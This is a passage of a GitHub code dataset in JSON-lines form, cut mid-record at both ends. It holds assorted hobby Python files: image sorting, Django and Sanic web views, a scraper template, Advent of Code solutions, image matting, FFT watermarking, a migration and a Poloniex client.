pickle.loads(handle.read())","repo_name":"udayagirisupraja/DjangoWebProject1","sub_path":"DjangoWebProject1/app/py_Files/Load_CSV.py","file_name":"Load_CSV.py","file_ext":"py","file_size_in_byte":769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8445949709","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport os\nfrom PIL import Image\nimport pytesseract\nimport cv2\nfrom matplotlib import pyplot as plt\nimport shutil\nimport glob\n\n\nlist_name=[]\nroot_dir = \"/media/tang/lzp/whu_buildings\" #输入根目录,在此根目录下将会存放不同分类的图像文件夹\n\n\ndef estimate(imgname):\n img = cv2.imread(imgname,0)\n # ret,thresh = cv2.threshold(img,0,230,cv2.THRESH_BINARY)\n height,width = img.shape\n # print(height,width)\n size = img.size\n # print(\"size:\"+ str(size))\n non_black_num = cv2.countNonZero(img)\n result = non_black_num/size\n # print(\"白色占比:\"+str(result))\n return result\n\ndef makenewdir(dirname):\n if not os.path.exists(dirname):\n os.mkdir(dirname)\n\ndef my_move(srcfn, dstdir): ##定义移动函数,参数为待移动的文件路径和目标目录\n if not os.path.isfile(srcfn): ##判断文件是否存在\n print('srcfn error')\n\n else:\n srcdir, fn = os.path.split(srcfn) ##分离绝对路径和相对路径,获得文件名\n\n if not os.path.exists(dstdir): ##如果目录不存在,创建目录\n os.makedirs(dstdir)\n\n dstfn = dstdir + fn ##生成目录下的文件名\n shutil.copyfile(srcfn, dstfn) ##复制\n\n\ndef get_common_name(path):\n filelist = os.listdir(path)\n common_name_flag = ''\n common_name_max = 0\n for file in filelist:\n\n Olddir = os.path.join(path, file) # 原来的文件路径\n if os.path.isdir(Olddir): # 如果是文件夹则进入文件夹内处理,进行递归,达到处理子文件夹内全部文件的目的\n # print(Olddir)\n get_common_name(Olddir)\n # continue\n else:\n # fns2 = glob.glob(path + '/*_1_label.png') ##获取当前目录下所有2.png格式的文件\n\n filename = os.path.splitext(file)[0] # 分离文件名与扩展名;得到文件名\n # print(filename)\n\n filetype = os.path.splitext(file)[1] # 文件扩展名(本例中是.png)\n # print(filetype)\n filepath = os.path.join(path, filename + filetype)\n # print(filepath)\n common_name = filename #适用于WHU\n if not common_name in list_name:\n list_name.append(common_name)\n # print(\"common name is \" + common_name)\n\n # print(list_name)\n return list_name\n\n\ndef classify(img_path,label_path):\n\n for name in list_name:\n # print(name)\n\n fns = glob.glob(img_path + '/'+ name +'.png')\n fns_label = glob.glob(label_path+'/' + name + '.png')\n\n img_percent = estimate(fns_label[0])\n if img_percent < 0.05:\n dst_dir = os.path.join(root_dir, 'less') # 存放目标存在20%以内的图片\n # print(dst_dir)\n #elif img_percent < 0.5:\n #dst_dir = os.path.join(root_dir, '20--50') # 存放目标存在20%以内的图片\n #elif img_percent < 0.7:\n #dst_dir = os.path.join(root_dir,'50--70')\n else:\n dst_dir = os.path.join(root_dir,'more')\n\n\n\n\n for img_name in fns:\n dst_dir_img = os.path.join(dst_dir,'images','train/')\n print(img_name+\" move to : \"+dst_dir_img)\n my_move(img_name,dst_dir_img)\n\n for img_name in fns_label:\n dst_dir_gt = os.path.join(dst_dir, 'gt', 'train/')\n print(img_name + \" move to : \"+dst_dir_gt)\n my_move(img_name,dst_dir_gt)\n\n\n\n return 0\n\nif __name__ == '__main__':\n label_path = os.path.join(root_dir,'gt','train')#输入存放label图像的文件路径\n img_path = os.path.join(root_dir,'images','train') #输入存放原图的文件路径\n get_common_name(label_path)\n classify(img_path,label_path)\n # move_all(\".\\\\gaofen_small\")\n","repo_name":"zpl99/GaofenCD_Solution","sub_path":"tools/classify_WHU.py","file_name":"classify_WHU.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"38223442621","text":"from aredis_om import get_redis_connection\nfrom sanic import Blueprint\nfrom sanic import response, HTTPResponse, Request\nfrom models import RatingHistory\nfrom functools import reduce\nfrom config import received_rating_topic\nimport json\n\nbp = Blueprint(\"Rating\", url_prefix=\"/ratings\")\nclient = get_redis_connection()\n\n\n@bp.get('/')\nasync def get_rating_by_id(request: Request, target_id: str) -> HTTPResponse:\n rating_list = RatingHistory.find(RatingHistory.target_id == target_id).all()\n size = len(rating_list)\n if size == 0:\n return response.json({'rating': 0.0})\n rating_num_list = [r.rate for r in rating_list]\n sum = reduce(lambda a, b: a + b, rating_num_list)\n result = sum / size\n return response.json({'rating': result})\n\n\n@bp.post('/')\nasync def add_rating(request: Request) -> HTTPResponse:\n body = request.json\n print(body)\n await client.publish(received_rating_topic, json.dumps(body, default=str))\n return response.empty(status=201)\n","repo_name":"marttp/emp-friendly","sub_path":"backend/rating/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"17501490301","text":"# A Web scraper template\n# Gets HTML code from a series of pages\n# and finds elements using jQuery selectors\n\nimport os, re, codecs, subprocess, time, random\nfrom datetime import datetime\n\nimport requests\nfrom pyquery import PyQuery as pq\n\n# pip install requests pyquery\n\n\ndef process_url(url):\n text = ''\n \n try:\n r = requests.get(url, headers={'User-agent':'Magic Browser'})\n # content = r.content\n d = pq(r.text)\n \n links = d('.course-list-item .content h4 a')\n for i in range(links.length):\n link = links.eq(i)\n text += link.html().strip() + ' :: ' + link.attr.href + '\\n'\n \n # item_price = d('.product-price-box .price').eq(0).text()\n except Exception as ex:\n print('Error: ' + str(ex))\n text = str(ex)\n \n return text\n\n\ndef run():\n # use generated list of pages or a static urls list\n prefix = 'https://abc.net/forum?page='\n urls = [prefix+str(x) for x in range(1,101)]\n \n urls = [\n 'http://url-1.net',\n 'http://url-2.net',\n ]\n \n f = codecs.open('scrape_result.txt', 'w', 'utf-8')\n \n date_str = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n f.write('[{}]\\n'.format(date_str))\n \n print('total:', len(urls))\n for url in urls:\n print('URL: ' + url)\n text = process_url(url)\n f.write(text + '\\n')\n time.sleep(0.2)\n \n f.close()\n \n \n# ---\nrun()\n","repo_name":"mortalis13/PythonScripts","sub_path":"web_scraper.py","file_name":"web_scraper.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25805805528","text":"\"\"\"Berries views module\"\"\"\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.routers import APIRootView\nfrom rest_framework.reverse import reverse\nfrom berries.api.berries_api import BerriesData\n\n\n# web navigation views\nclass BerryStatsView(APIView):\n \"Berry stats API root view\"\n\n def get(self, request, format=None):\n \"Return endpoint view\"\n berries = BerriesData()\n data = {\n \"berries_names\":berries.names_list(),\n \"min_growth_time\":berries.min_growth_time(),\n \"median_growth_time\":berries.median_growth_time(),\n \"max_growth_time\":berries.max_growth_time(),\n \"variance_growth_time\":berries.variance_growth_time(),\n \"mean_growth_time\":berries.mean_growth_time(),\n \"frequency_growth_times\":berries.frequency_growth_time(),\n }\n return Response(data)\n\nclass BerriesRootView(APIRootView):\n \"\"\"\n Berries API root view\n \"\"\"\n def get_view_name(self):\n return \"Berries\"\n\n def get(self, request, format=None):\n return Response({\n # register all api urls\n \"allBerryStats\": reverse(\"berries-api:stats\", request=request, format=format),\n })\n","repo_name":"contreraspablo9/PokeBerries","sub_path":"pokeberries/berries/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38636710188","text":"\ndef find_possible_sums_from_nums(nums):\n sums = set()\n for i in range(len(nums)):\n for j in range(i + 1, len(nums)):\n sums.add(nums[i] + nums[j])\n return sums\n\ndef find_weak_number(preamble_len, input):\n for i in range(preamble_len, len(input)):\n num = input[i]\n sums = find_possible_sums_from_nums(input[i - preamble_len:i])\n if num not in sums:\n return num\n\ndef find_encryption_weakness(weak_number, nums):\n prefix_sums = list(nums)\n prefix_sums.insert(0, 0)\n for i in range(1, len(nums)):\n prefix_sums[i] += prefix_sums[i - 1]\n\n for i in range(len(nums)):\n for j in range(i + 2, len(nums)):\n if prefix_sums[j] - prefix_sums[i] == weak_number:\n return nums[i:j]\n\nif __name__ == \"__main__\":\n with open(\"day_9/input.txt\") as fin:\n input = list(map(int, fin))\n\n # part 1\n weak_number = find_weak_number(25, input)\n print(weak_number)\n\n #part 2\n encryption_weakness = find_encryption_weakness(weak_number, input)\n print(min(encryption_weakness) + max(encryption_weakness))\n","repo_name":"maxpaulus43/adventofcode2020","sub_path":"day_9/day_9.py","file_name":"day_9.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9643806708","text":"import torch\n\nfrom PIL import Image\nfrom torchvision.transforms import functional as F\n\nfrom . import transforms\nfrom .model.matting_net import MattingNet\n\n\nclass Matting:\n def __init__(self, checkpoint_path='', gpu=False):\n torch.set_flush_denormal(True) # flush cpu subnormal float.\n self.checkpoint_path = checkpoint_path\n self.gpu = gpu\n self.model = self.__load_model()\n\n def __load_model(self):\n model = MattingNet()\n if self.gpu and torch.cuda.is_available():\n model.cuda()\n else:\n model.cpu()\n\n # load checkpoint.\n checkpoint = torch.load(self.checkpoint_path, map_location='cpu')\n model.load_state_dict(checkpoint['model_state_dict'])\n model.eval()\n return model\n\n def matting(self, image_path, with_img_trimap=False, net_img_size=-1, max_size=-1, trimap=None):\n \"\"\"\n :param trimap:\n :param image_path:\n :param with_img_trimap: return origin image and pred_trimap.\n :param net_img_size : resize to training size for better result. (resize <= 0 => no resize)\n :param max_size : max size for test. (max_size <= 0 => no resize)\n :return:\n pred_matte : shape: [H, w, 1 ] range: [0, 1]\n image : shape: [H, W, RGB(3) ] range: [0, 1]\n pred_trimap: shape: [H, w, 1 ] range: [0, 1]\n \"\"\"\n with torch.no_grad():\n image = self.__load_image_tensor(image_path, max_size)\n trimap_3 = self.__load_trimap_tensor(trimap, max_size)\n if self.gpu and torch.cuda.is_available():\n image = image.cuda()\n if trimap_3 is not None:\n trimap_3 = trimap_3.cuda()\n else:\n image = image.cpu()\n if trimap_3 is not None:\n trimap_3 = trimap_3.cpu()\n\n b, c, h, w = image.shape\n\n # resize to training size.\n if net_img_size > 0:\n resize_image = F.resize(image, [net_img_size, net_img_size], Image.BILINEAR)\n resize_trimap = None\n if trimap_3 is not None:\n resize_trimap = F.resize(trimap_3, [net_img_size, net_img_size], Image.BILINEAR)\n pred_matte, pred_trimap_prob, _ = self.model(resize_image, resize_trimap)\n pred_matte = F.resize(pred_matte, [h, w])\n pred_trimap_prob = F.resize(pred_trimap_prob, [h, w], Image.BILINEAR)\n else:\n pred_matte, pred_trimap_prob, _ = self.model(image, trimap_3)\n\n pred_matte = pred_matte.cpu().detach().squeeze(dim=0).numpy().transpose(1, 2, 0)\n image = image.cpu().detach().squeeze(dim=0).numpy().transpose(1, 2, 0)\n\n pred_trimap = pred_trimap_prob.squeeze(dim=0).softmax(dim=0).argmax(dim=0)\n pred_trimap = pred_trimap.cpu().detach().unsqueeze(dim=2).numpy() / 2.\n\n if not with_img_trimap:\n return pred_matte\n\n return pred_matte, image, pred_trimap\n\n @staticmethod\n def __load_image_tensor(image_path, max_size=-1):\n image = Image.open(image_path).convert('RGB')\n if max_size > 0:\n [image] = transforms.ResizeIfBiggerThan(max_size)([image])\n [image] = transforms.ToTensor()([image])\n image = image.unsqueeze(dim=0)\n return image\n\n def __load_trimap_tensor(self, trimap, max_size=-1):\n if trimap is None:\n return None\n # trimap = Image.open(trimap_path).convert('L')\n trimap = Image.fromarray(trimap).convert('L')\n\n if max_size > 0:\n [trimap] = transforms.ResizeIfBiggerThan(max_size)([trimap])\n [trimap] = transforms.ToTensor()([trimap])\n\n # get 3-channels trimap.\n trimap_3 = trimap.repeat(3, 1, 1)\n trimap_3[0, :, :] = (trimap_3[0, :, :] <= 0.1).float()\n trimap_3[1, :, :] = ((trimap_3[1, :, :] < 0.9) & (trimap_3[1, :, :] > 0.1)).float()\n trimap_3[2, :, :] = (trimap_3[2, :, :] >= 0.9).float()\n\n trimap_3 = trimap_3.unsqueeze(dim=0)\n return trimap_3\n","repo_name":"moiling/PortraitMatting-PyQt","sub_path":"algorithm/matte/matting.py","file_name":"matting.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10933981726","text":"# 版本号:1.0\n# 修改记录:2023/06/08 完成程序的主要功能:图像的分块FFT、加嵌水印、分块逆FFT\n# 作者:李铭辉\n# 联系方式:2011266@mail.nankai.edu.com\n\nimport sys\nimport random\n\ncmd = None\nseed = 2011266\nalpha = 100\nblock_size = 8\npath1 = None\npath2 = None\npath3 = None\n\nif __name__ == '__main__':\n if '-h' in sys.argv or '--help' in sys.argv or len(sys.argv) < 2:\n print('用法: python my_watermark.py [arg...] [opts...]')\n print(' 命令:')\n print(' encode ')\n print(' 图像 + 水印 -> 编码后的图像')\n print(' decode ')\n print(' 图像 + 编码后的图像 -> 水印')\n print(' 选项:')\n print(' --seed ,手动设置随机种子(默认为2011266)')\n print(' --blocksize ,手动设置块大小(默认为8)')\n print(' --alpha ,手动设置alpha值(默认为100)')\n sys.exit(1)\n cmd = sys.argv[1]\n if cmd != 'encode' and cmd != 'decode':\n print('错误的命令 %s' % cmd)\n sys.exit(1)\n if '--seed' in sys.argv:\n p = sys.argv.index('--seed')\n if len(sys.argv) <= p+1:\n print('缺少 --seed 后面的 ')\n sys.exit(1)\n seed = int(sys.argv[p+1])\n del sys.argv[p+1]\n del sys.argv[p]\n if '--blocksize' in sys.argv:\n p = sys.argv.index('--blocksize')\n if len(sys.argv) <= p+1:\n print('缺少 --blocksize 后面的 ')\n sys.exit(1)\n block_size = int(sys.argv[p+1])\n del sys.argv[p+1]\n del sys.argv[p]\n if '--alpha' in sys.argv:\n p = sys.argv.index('--alpha')\n if len(sys.argv) <= p+1:\n print('缺少 --alpha 后面的 ')\n sys.exit(1)\n alpha = float(sys.argv[p+1])\n del sys.argv[p+1]\n del sys.argv[p]\n if cmd == 'encode':\n if len(sys.argv) < 4:\n print('缺少参数...')\n sys.exit(1)\n path1 = sys.argv[2]\n path2 = sys.argv[3]\n path3 = sys.argv[4]\n else:\n if len(sys.argv) < 3:\n print('缺少参数...')\n sys.exit(1)\n path1 = sys.argv[2]\n path2 = sys.argv[3]\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef fft_block(image):\n '''\n 对图像进行分块FFT\n '''\n blocks_h = image.shape[0] // block_size\n blocks_w = image.shape[1] // block_size\n fft_blocks = np.zeros(shape=((blocks_h, blocks_w, block_size, block_size)))\n fft_blocks = fft_blocks.astype(\"complex\")\n h_data = np.vsplit(image, blocks_h)\n for h in range(blocks_h):\n block_data = np.hsplit(h_data[h], blocks_w)\n for w in range(blocks_w):\n fft_blocks[h, w, ...] = np.fft.fft2(block_data[w])\n return fft_blocks\n\ndef embed(blocks, watermark):\n '''\n 将分块FFT的结果嵌入水印\n '''\n embed_blocks = blocks.copy()\n for h in range(watermark.shape[0]):\n for w in range(watermark.shape[1]):\n k = k1 if watermark[h, w] == 1 else k2\n for i in range(block_size):\n embed_blocks[h, w, i, block_size-1-i] = blocks[h, w, i, block_size-1-i] + alpha * k[i]\n for i in range(i, block_size-1):\n embed_blocks[h, w, block_size-i, 1+i] = blocks[h, w, block_size-i, 1+i] + alpha * k[i]\n return embed_blocks\n\ndef ifft_block(blocks):\n '''\n 对分块进行逆FFT得到图像\n '''\n row = None\n result = None\n h, w = blocks.shape[0], blocks.shape[1]\n for i in range(h):\n for j in range(w):\n block = np.fft.ifft2(blocks[i, j, ...]).real\n row = block if j == 0 else np.hstack((row, block))\n result = row if i == 0 else np.vstack((result, row))\n return result.astype(np.uint8)\n\ndef corr2(a, b):\n '''\n 计算两个数组的相关程度\n '''\n a = a - np.sum(a) / np.size(a)\n b = b - np.sum(b) / np.size(b)\n np.linalg.norm(b, 2)\n numerator = np.dot(a, b)\n denominator = (np.linalg.norm(a, 2) * np.linalg.norm(b, 2))\n if denominator != 0:\n r = numerator / denominator\n elif numerator > 0:\n r = float(\"-inf\")\n elif numerator < 0:\n r = float(\"inf\")\n elif numerator == 0:\n r = 0.0\n return r\n\ndef get_watermark(embed_U_image, watermark_size):\n '''\n 提取水印\n '''\n w_h, w_w = watermark_size\n extract_watermark = np.zeros(shape=watermark_size)\n extract_watermark.astype(np.uint8)\n fft_blocks = fft_block(embed_U_image)\n temp = np.zeros(block_size)\n temp = temp.astype(\"complex\")\n for h in range(w_h):\n for w in range(w_w):\n for i in range(block_size):\n temp[i] = fft_blocks[h, w, i, block_size-1-i]\n if corr2(temp, k1) > corr2(temp, k2):\n extract_watermark[h, w] = 255\n else:\n extract_watermark[h, w] = 0\n return extract_watermark.astype(np.uint8)\n\nif cmd == 'encode':\n image_path = path1\n watermark_path = path2\n embed_image_path = path3\n # 第一步、读取水印和图片\n\n\n watermark = cv2.imread(watermark_path, cv2.IMREAD_GRAYSCALE)\n watermark = np.where(watermark < np.mean(watermark), 0, 1)\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n # 第二步、检查小块的边长是否合理\n i_h, i_w = image.shape[:2]\n if not(i_h % block_size == 0 and i_w % block_size == 0):\n print(\"图像的宽度或高度无法被小方块的边长整除!小方块的边长为 {:},原图的尺寸为 {:}!请重新选择小方块的边长!\".format(\n block_size, image.shape))\n sys.exit(1)\n # 第三步、调整水印的宽高\n watermark = cv2.resize(watermark, (i_w // block_size, i_h // block_size), interpolation=cv2.INTER_LINEAR_EXACT) # 重新设置水印的大小\n # 第四步、提取U层\n yuv_image = cv2.cvtColor(image, cv2.COLOR_RGB2YUV)\n Y_image, U_image, V_image = yuv_image[..., 0], yuv_image[..., 1], yuv_image[..., 2]\n # 第五步、生成两个随机数组,用于编码\n np.random.seed(seed)\n k1 = np.random.randn(block_size)\n k2 = np.random.randn(block_size)\n # 第六步、对U层进行分块FFT\n fft_blocks = fft_block(U_image)\n # 第七步、嵌入水印\n embed_blocks = embed(fft_blocks, watermark)\n # 第八步、对分块进行逆FFT\n embed_U_image = ifft_block(embed_blocks)\n # 第九步、将U层放回,得到带水印的图像\n yuv_image[..., 1] = embed_U_image\n embed_image = cv2.cvtColor(yuv_image, cv2.COLOR_YUV2RGB)\n plt.imsave(embed_image_path, embed_image)\nelse:\n embed_image_path = path1\n extract_watermark_path = path2\n # 第一步、读取图片\n embed_image = cv2.imread(embed_image_path)\n embed_image = cv2.cvtColor(embed_image, cv2.COLOR_BGR2RGB)\n # 第二步、提取U层\n embed_U_image = cv2.cvtColor(embed_image, cv2.COLOR_RGB2YUV)[..., 1]\n # 第三步、检查小方块的边长是否合理\n i_h, i_w = embed_U_image.shape # 获取原图的大小\n if not(i_h % block_size == 0 and i_w % block_size == 0):\n print(\"图像的宽度或高度无法被小方块的边长整除!小方块的边长为 {:},原图的尺寸为 {:}!请重新选择小方块的边长!\".format(\n block_size, image.shape))\n sys.exit(1)\n # 第四步、生成两个随机数组,用于解码\n np.random.seed(seed)\n k1 = np.random.randn(block_size)\n k2 = np.random.randn(block_size)\n # 第五步、提取水印\n extract_watermark = get_watermark(embed_U_image, (i_h // block_size, i_w // block_size))\n # 第六步、保存提取的水印\n plt.imsave(extract_watermark_path, extract_watermark, cmap='gray')\n","repo_name":"BianLianYaoGuai/Watermark","sub_path":"my_watermark.py","file_name":"my_watermark.py","file_ext":"py","file_size_in_byte":7876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19070830922","text":"input = open(\"day14_input.txt\")\ni = input.readline()[:-1]\n\nscan = [[\".\" * 600] for i in range(200)]\nsecond_scan = [[\".\" * 1500] for i in range(1500)]\nsand_bottom = 0\n\n# parsing\nwhile i:\n\tpairs = i.split(\" -> \")\n\told_pair = pairs[0].split(\",\")\n\tpairs = pairs[1:]\n\n\tfor pair in pairs:\n\t\tcoord = pair.split(\",\")\n\t\tsmallest_y = min(int(coord[1]), int(old_pair[1]))\n\t\tlargest_y = max(int(coord[1]), int(old_pair[1]))\n\t\tif(largest_y > sand_bottom):\n\t\t\tsand_bottom = largest_y\n\n\t\tif(smallest_y != largest_y):\n\t\t\tfor j in range(smallest_y, largest_y + 1):\n\t\t\t\tscan[j][0] = scan[j][0][:int(coord[0])] + \"#\" + scan[j][0][int(coord[0]) + 1:]\n\t\t\t\tsecond_scan[j][0] = second_scan[j][0][:int(coord[0])] + \"#\" + second_scan[j][0][int(coord[0]) + 1:]\n\n\t\tsmallest_x = min(int(coord[0]), int(old_pair[0]))\n\t\tlargest_x = max(int(coord[0]), int(old_pair[0]))\n\t\tif(smallest_x != largest_x):\n\t\t\tfor j in range(smallest_x, largest_x + 1):\n\t\t\t\tscan[int(coord[1])][0] = scan[int(coord[1])][0][:j] + \"#\" + scan[int(coord[1])][0][j + 1:]\n\t\t\t\tsecond_scan[int(coord[1])][0] = second_scan[int(coord[1])][0][:j] + \"#\" + second_scan[int(coord[1])][0][j + 1:]\n\t\t\n\t\told_pair = coord\n\n\ti = input.readline()[:-1]\n\nsand_count = 0\ni = 0\nj = 500\nwhile(True):\n\t# check for endless falling\n\tif(i >= sand_bottom):\n\t\tbreak\n\n\t# try to move down\n\tif(scan[i + 1][0][j] == \".\"):\n\t\ti += 1\n\t\tcontinue\n\t# try to move down + left\n\telif(scan[i + 1][0][j - 1] == \".\"):\n\t\tj -= 1\n\t\ti += 1\n\t\tcontinue\n\t# try to move down + right\n\telif(scan[i + 1][0][j + 1] == \".\"):\n\t\tj += 1\n\t\ti += 1\n\t\tcontinue\n\t# otherwise we have to stop\n\telse:\n\t\tsand_count += 1\n\t\tscan[i][0] = scan[i][0][:j] + \"#\" + scan[i][0][j + 1:]\n\t\t(i, j) = (0, 500)\n\n# visualizing\n#[print(row[0][477:550]) for row in scan[0:175]]\n\n# part 1: \nprint(\"day14: solution for part 1: \" + str(sand_count))\n\nsand_count = 0\ni = 0\nj = 500\nwhile(True):\n\t# check for stop condition\n\tif(second_scan[0][0][500] == \"#\"):\n\t\tbreak\n\t# check for collision with floor\n\tif(i >= sand_bottom + 2):\n\t\tsecond_scan[i][0] = second_scan[i][0][:j] + \"#\" + second_scan[i][0][j + 1:]\n\t\t(i, j) = (0, 500)\n\t# try to move down\n\tif(second_scan[i + 1][0][j] == \".\"):\n\t\ti += 1\n\t\tcontinue\n\t# try to move down + left\n\telif(second_scan[i + 1][0][j - 1] == \".\"):\n\t\tj -= 1\n\t\ti += 1\n\t\tcontinue\n\t# try to move down + right\n\telif(second_scan[i + 1][0][j + 1] == \".\"):\n\t\tj += 1\n\t\ti += 1\n\t\tcontinue\n\t# otherwise we have to stop\n\telse:\n\t\tsand_count += 1\n\t\tsecond_scan[i][0] = second_scan[i][0][:j] + \"#\" + second_scan[i][0][j + 1:]\n\t\t(i, j) = (0, 500)\n\n# visualizing\n#[print(row[0][350:750]) for row in second_scan[0:179]]\n\n# part 2: \nprint(\"day14: solution for part 2: \" + str(sand_count))","repo_name":"Simonolsson98/AdventOfCode","sub_path":"2022/day14.py","file_name":"day14.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31405045817","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.contrib.contenttypes.fields import GenericForeignKey\n\n\n# Create your models here.\nclass Like(models.Model):\n\n object_id = models.PositiveIntegerField() # tweet_id or comment_id\n content_type = models.ForeignKey(\n ContentType,\n on_delete=models.SET_NULL,\n null=True,\n )\n content_object = GenericForeignKey('content_type', 'object_id')\n\n user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = (\n ('user', 'content_type', 'object_id'),\n )\n\n # 按照时间排序某个被like的content_object的所有的list\n index_together = (\n ('content_type', 'object_id', 'created_at'),\n )\n\n def __str__(self):\n return '{} - {} liked {} {}'.format(\n self.created_at,\n self.user,\n self.content_type,\n self.object_id,\n )\n","repo_name":"WilburZjh/react-django-project","sub_path":"django_backend/likes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"14508375809","text":"\"\"\"v0.1.0-add-token-fields\n\nRevision ID: a51236f82a74\nRevises: a13532f366ab\nCreate Date: 2023-03-05 19:01:03.264159\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlmodel\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a51236f82a74'\ndown_revision = 'a13532f366ab'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_index(op.f('ix_pools_base_name'), 'pools', ['base_name'], unique=False)\n op.create_index(op.f('ix_pools_base_symbol'), 'pools', ['base_symbol'], unique=False)\n op.create_index(op.f('ix_pools_name'), 'pools', ['name'], unique=False)\n op.create_index(op.f('ix_pools_quote_name'), 'pools', ['quote_name'], unique=False)\n op.create_index(op.f('ix_pools_quote_symbol'), 'pools', ['quote_symbol'], unique=False)\n op.create_index(op.f('ix_pools_type'), 'pools', ['type'], unique=False)\n op.add_column('tokens', sa.Column('holders', sa.Integer(), nullable=True))\n op.add_column('tokens', sa.Column('total_supply', sa.Float(), nullable=True))\n op.create_index(op.f('ix_tokens_name'), 'tokens', ['name'], unique=False)\n op.create_index(op.f('ix_tokens_symbol'), 'tokens', ['symbol'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_tokens_symbol'), table_name='tokens')\n op.drop_index(op.f('ix_tokens_name'), table_name='tokens')\n op.drop_column('tokens', 'total_supply')\n op.drop_column('tokens', 'holders')\n op.drop_index(op.f('ix_pools_type'), table_name='pools')\n op.drop_index(op.f('ix_pools_quote_symbol'), table_name='pools')\n op.drop_index(op.f('ix_pools_quote_name'), table_name='pools')\n op.drop_index(op.f('ix_pools_name'), table_name='pools')\n op.drop_index(op.f('ix_pools_base_symbol'), table_name='pools')\n op.drop_index(op.f('ix_pools_base_name'), table_name='pools')\n # ### end Alembic commands ###\n","repo_name":"balancednetwork/balanced-backend","sub_path":"balanced_backend/alembic/versions/a51236f82a74_v0_1_0_add_token_fields.py","file_name":"a51236f82a74_v0_1_0_add_token_fields.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43898159113","text":"import time\nimport sqlite3\nimport threading\nimport globalvars\nimport api\nfrom api import polo\n\ndbConn = None\ndbCursor = None\n\ndef dbExec(cursor, query, args=[]):\n cursor.execute(query, args)\n return cursor.fetchall()\n\n# THREAD FUNCTIONS\ndef tickerUpdate(oneshot=False):\n while True:\n globalvars.ticker = polo.returnTicker()\n if oneshot:\n break\n time.sleep(1)\n\ndef balanceUpdate(oneshot=False):\n while True:\n globalvars.balances = api.getAllBalances()\n globalvars.totalBtcBalance = api.getAllBalances(total=True)\n if oneshot:\n break\n time.sleep(300)\n\n# FUNCTIONS\ndef makePairsList():\n pairs = []\n for pair in globalvars.ticker.keys():\n pairs.append(pair)\n return pairs\n\ndef updateAvailablePairs():\n pairs = globalvars.ticker.keys()\n availablePairs = {}\n for pair in pairs:\n base, coin = pair.split('_')\n if base in availablePairs.keys():\n availablePairs[base].append(coin)\n else:\n availablePairs[base] = [coin]\n return availablePairs\n\ndef updateDisplayCurrencies():\n pairs = globalvars.ticker.keys()\n coins = ['BTC']\n for pair in pairs:\n if pair[-3:] == 'BTC':\n base, coin = pair.split('_')\n coins.append(base)\n return coins\n\ndef dbAddGlobalvar(cursor, name, value):\n result = dbExec(cursor, 'SELECT value FROM globalvars WHERE name = ?', [name])\n if len(result) == 0:\n dbExec(cursor, 'INSERT INTO globalvars (name, value) VALUES (?, ?)', [name, str(value)])\n result = dbExec(cursor, 'SELECT value FROM globalvars WHERE name = ?', [name])\n return eval(result[0][0])\n\ndef loadInitialData():\n global dbConn, dbCursor\n\n tickerUpdate(oneshot=True)\n balanceUpdate(oneshot=True)\n\n # START THREADS\n tickerThread = threading.Thread(target=tickerUpdate)\n tickerThread.start()\n balanceThread = threading.Thread(target=balanceUpdate)\n balanceThread.start()\n\n # CREATE DATABASE\n dbConn = sqlite3.connect('poloClient.db')\n dbCursor = dbConn.cursor()\n # Create tables\n data = dbExec(dbCursor, 'CREATE TABLE IF NOT EXISTS globalvars (name TEXT, value TEXT)')\n data = dbExec(dbCursor, 'CREATE TABLE IF NOT EXISTS tracked_pairs (name TEXT, base TEXT, coin TEXT)')\n dbConn.commit()\n # CREATE VARIABLES\n globalvars.availablePairs = dbAddGlobalvar(dbCursor, 'availablePairs', updateAvailablePairs())\n globalvars.displayCurrencies = dbAddGlobalvar(dbCursor, 'displayCurrency', updateDisplayCurrencies())\n globalvars.pairsList = dbAddGlobalvar(dbCursor, 'pairsList', makePairsList())\n\n dbConn.commit()\n\nif __name__ == '__main__':\n loadInitialData()\n","repo_name":"muckas/polo-client","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30847777445","text":"from mySql import 